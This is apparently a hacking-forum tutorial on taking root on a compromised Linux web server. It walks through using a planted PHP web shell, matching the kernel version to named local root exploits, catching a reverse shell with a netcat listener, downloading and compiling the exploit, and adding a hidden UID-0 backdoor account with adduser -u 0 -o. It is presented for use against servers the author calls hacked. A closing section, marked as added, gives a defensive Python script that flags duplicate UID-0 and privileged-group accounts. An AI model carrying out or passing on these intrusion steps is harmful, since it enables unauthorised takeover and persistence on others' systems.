Rooting Tutorial and Adding New Root User

Hello all and welcome to a tutorial on how to root a Linux server.
This is going to be a short, HQ tutorial with pictures included (for better learning).

So let's start with things you will need:

1) Shelled website
2) Local root exploit
3) NetCat

Chapter 1 - Gathering information

Open up your .php shell on a hacked webserver.
I have mine for an example

Now you need to check what kernel your slave is using...
It should be something like

Linux 2.6.18-8.el5 #1 SMP Fri Jan 26 14:15:21 EST 2007 i686

The next thing you want to do is look for a local root exploit.
From the example provided, mine is 2.6.18-8.el5 #1 SMP Fri Jan 26 14:15:21 EST 2007 i686.

Here's the list of exploits

2.2 ->  ptrace
2.4.17 -> newlocal, kmod, uselib24
2.4.18 -> brk, brk2, newlocal, kmod
2.4.19 -> brk, brk2, newlocal, kmod
2.4.20 -> ptrace, kmod, ptrace-kmod, brk, brk2
2.4.21 -> brk, brk2, ptrace, ptrace-kmod
2.4.22 -> brk, brk2, ptrace, ptrace-kmod
2.4.22-10 -> loginx
2.4.23 -> mremap_pte
2.4.24 -> mremap_pte, uselib24
2.4.25-1 -> uselib24
2.4.27 -> uselib24
2.6.2 -> mremap_pte, krad, h00lyshit
2.6.5 -> krad, krad2, h00lyshit
2.6.6 -> krad, krad2, h00lyshit
2.6.7 -> krad, krad2, h00lyshit
2.6.8 -> krad, krad2, h00lyshit
2.6.8-5 -> krad2, h00lyshit
2.6.9 -> krad, krad2, h00lyshit
2.6.9-34 -> r00t, h00lyshit
2.6.10 -> krad, krad2, h00lyshit
2.6.13 -> raptor, raptor2, h0llyshit, prctl
2.6.14 -> raptor, raptor2, h0llyshit, prctl
2.6.15 -> raptor, raptor2, h0llyshit, prctl
2.6.16 -> raptor, raptor2, h0llyshit, prctl
2.6.23 - 2.6.24 -> diane_lane_******_hard.c
2.6.17 - 2.6.24-1 -> jessica_biel_naked_in_my_bed.c

Now that you have confirmed your exploit, it's time to find it...
Google is your best friend and this site here... It does have many exploits.

NOTE: If your webserver has a 2.6.18 2011 kernel, then you have a 0.0001% chance of rooting it, because there's no public exploit for that version.

Chapter 2 - Backconnecting to the server

For this you will need:

1) NetCat
2) Open port (for example, 443. I won't teach how to port forward; use Google if you don't know how!)

So open your netcat and type:

-l -n -v -p 443

Hit "Enter"

Now it should write "listening on [any] 443 ..."
Go back to your shell and go to "BackConnect function"
Many shells have it.
Enter your port and press "Connect".

[Image: 23cSqoxuW7FY3MO-Region.png]

Now it should connect to your netcat
I got something like this:

[Image: FuV6epg7POchdxV-CWINDOWSsystem32.png]

Chapter 3 - Downloading exploit and executing it

Now we will need our exploit from Chapter 1
There are 2 ways of uploading:

1) Using shell uploader
2) Using 'wget' function (Requires backconnection)

I'm going to use 'wget' function because it's easier and faster.
So copy your exploit link (Mine one and go back to your netcat and type:


Now it downloaded our exploit named "" on our server.

If your exploit is downloaded as anyrandomname.c, you must compile it.
To do that, first download the exploit and then type:

gcc anyrandomname.c -o anyrandomname

And our exploit is compiled. (If you get errors when compiling then find another exploit)

[Image: vjUt4DhVknKljlm-CWINDOWSsystem32.png]

If you downloaded your exploit in zip file type:


[Image: XgNQSgGHdRXyIN5-CWINDOWSsystem32.png]

Now you should have your exploit (Like mine "2.6.18-164")

If you completed all steps it's time to get root.


chmod 777 yourexploit'sname

Using common sense, where I typed "yourexploit'sname" you will type your exploit's name.

And one last final step is to run our exploit


To check if you got root type




My steps to root

[Image: 1nOr845qTNAPEn3-CWINDOWSsystem32.png]

Chapter 4 - Adding root user

Adding a new root user is fairly easy.
We use this command:

adduser -u 0 -o -g 0 -G 0,1,2,3,4,6,10 -M root2

Command explanations:

Quote:adduser - Using Linux adduser command to create a new user account or to update default new user information.

-u 0 -o - Set the value of user id to 0.

-g 0 - Set the initial group number or name to 0

-G 0,1,2,3,4,6,10 - Set supplementary group to:
0 = root
1 = bin
2 = daemon
3 = sys
4 = adm
6 = disk
10 = wheel

-M - 'home directory' not created for the user.

root2 - User name of the new user account.

NOTE: Change root2 to your desired username.

Now you need to set a password for your username.
Type the following:

passwd root2

(root2 is your username)

See an example

[root@fedora ~]# passwd root2
Changing password for user root2.
New UNIX password:
Retype new UNIX password:
passwd: all authentication tokens updated successfully.

To check if you did alright

id root2

(root2 is your username)

[Image: LEoszc56WjqoepL-CWINDOWSsystem32.png]

All programs/sites I used:

GNY shell -
Google -
NetCat -

So that concludes our rooting tutorial.
I hope that someone will learn from this and that this thread will be bookmarked for generations.
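
From the defender's side, the account created in Chapter 4 leaves a clear trace: a second name sharing UID 0, plus membership in the privileged groups listed there. The following added example (not part of the original tutorial) audits passwd and group data for that pattern; the sample file contents and the `expected` allowlist are constructed assumptions.

```python
# Supplementary GIDs named in Chapter 4: root, bin, daemon, sys, adm, disk, wheel.
PRIVILEGED_GIDS = {0, 1, 2, 3, 4, 6, 10}

# Constructed sample files, not taken from any real host.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
apache:x:48:48:Apache:/var/www:/sbin/nologin
alice:x:500:500:Alice:/home/alice:/bin/bash
root2:x:0:0::/home/root2:/bin/bash
"""
SAMPLE_GROUP = """\
root:x:0:root,root2
adm:x:4:root,adm,daemon,root2
disk:x:6:root,root2
wheel:x:10:root,alice,root2
apache:x:48:
"""

def records(text, nfields):
    """Yield split fields for each non-comment line with exactly nfields fields."""
    for line in text.splitlines():
        fields = line.strip().split(":")
        if len(fields) == nfields and not line.startswith("#"):
            yield fields

def extra_uid0_accounts(passwd_text):
    """Names other than 'root' whose UID is 0 (a duplicated, non-unique UID)."""
    return [f[0] for f in records(passwd_text, 7)
            if f[2].isdigit() and int(f[2]) == 0 and f[0] != "root"]

def unexpected_privileged_members(group_text, expected):
    """Map user -> sorted privileged GIDs for members missing from `expected`."""
    hits = {}
    for _name, _pw, gid, members in records(group_text, 4):
        if not gid.isdigit() or int(gid) not in PRIVILEGED_GIDS:
            continue
        for user in filter(None, members.split(",")):
            if user not in expected:
                hits.setdefault(user, []).append(int(gid))
    return {user: sorted(gids) for user, gids in hits.items()}

if __name__ == "__main__":
    print(extra_uid0_accounts(SAMPLE_PASSWD))
    print(unexpected_privileged_members(SAMPLE_GROUP, {"root", "adm", "daemon"}))
```

On a live host, pass the contents of /etc/passwd and /etc/group in place of the samples and set `expected` to the accounts your baseline allows in those groups.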